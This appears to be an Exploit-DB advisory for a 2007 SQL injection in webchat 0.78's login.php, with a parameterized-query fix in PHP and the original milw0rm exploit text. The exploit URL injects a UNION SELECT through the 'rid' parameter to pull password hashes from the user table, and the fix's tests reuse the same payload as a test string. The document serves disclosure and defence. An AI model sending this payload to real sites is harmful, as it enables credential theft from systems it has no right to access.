Author: r00t
CVSS: N/A
CWE: 89 (SQL Injection)
Affected Version From: webchat 0.78
Affected Version To: webchat 0.78
Patch Exists: NO
Year: 2007

webchat 0.78 SQL Injection

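The vulnerability is in the login.php file of webchat 0.78, which inserts the 'rid' URL parameter directly into a quoted string in a SELECT on the room table. Because the value is neither escaped nor bound, an attacker who manipulates 'rid' can close the quote and append a UNION query, extracting sensitive information from the user table.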

Mitigation:

To mitigate this vulnerability, validate the 'rid' input and use parameterized queries in login.php, so that the parameter is never interpreted as SQL.
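
One way to apply this mitigation to the 'rid' lookup, as an added example that is not part of the original advisory or of webchat's code. It assumes PDO with an in-memory SQLite database in place of DB_Chat, a constructed two-table schema, and a digits-only room id; open_sample_db, valid_rid and find_room are hypothetical names.

```php
<?php
// Added example, not webchat's code. PDO stands in for the DB_Chat wrapper;
// the schema and rows are constructed sample data.

function open_sample_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec("CREATE TABLE room (rid TEXT PRIMARY KEY, name TEXT)");
    $pdo->exec("CREATE TABLE user (uid INTEGER PRIMARY KEY, pass TEXT)");
    $pdo->exec("INSERT INTO room VALUES ('1', 'lobby')");
    $pdo->exec("INSERT INTO user VALUES (1, 'constructed-secret')");
    return $pdo;
}

// Input validation. Assumed id format: 1-10 decimal digits. Request values
// can also arrive as arrays (rid[]=x), so the type is checked first.
function valid_rid($rid): bool
{
    return is_string($rid) && preg_match('/^[0-9]{1,10}$/D', $rid) === 1;
}

// Parameterized lookup: the value is bound, never concatenated into the SQL.
function find_room(PDO $pdo, string $rid): ?array
{
    $stmt = $pdo->prepare('SELECT rid, name FROM room WHERE rid = :rid');
    $stmt->execute([':rid' => $rid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = open_sample_db();
// The rid value from the page's URL, URL-decoded.
$crafted = "-1' UNION ALL SELECT uid,pass,null,null,null from user WHERE uid=1/*";

$checks = [
    'valid id returns its room'        => find_room($pdo, '1') === ['rid' => '1', 'name' => 'lobby'],
    'crafted rid matches no room'      => find_room($pdo, $crafted) === null,
    'crafted rid fails validation'     => valid_rid($crafted) === false,
    'array-typed rid fails validation' => valid_rid(['1']) === false,
];
foreach ($checks as $label => $passed) {
    echo ($passed ? 'PASS' : 'FAIL') . "  $label\n";
}
```

The bound lookup is the control that stops the injection; the format check is defence in depth and should be adjusted to the real room id format.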
Source

Exploit-DB raw data:

#########################################################################
#
#               [webchat 0.78]
#
# Class:     SQL Injection
# Published  28/06/2007
# Remote:    Yes
# Critical   Level : Dangerous
# Site:      http://sourceforge.net/projects/webdev-webchat/
# Download:  http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author:    r00t
#########################################################################


               Vulnerable code:
               login.php
======================================================
<?
       $q = new DB_Chat;
       $q->query("select * from room where rid='$rid'");
       if ($q->next_record()) {
?>
=======================================================

               Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================

               Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================

# milw0rm.com [2007-06-28]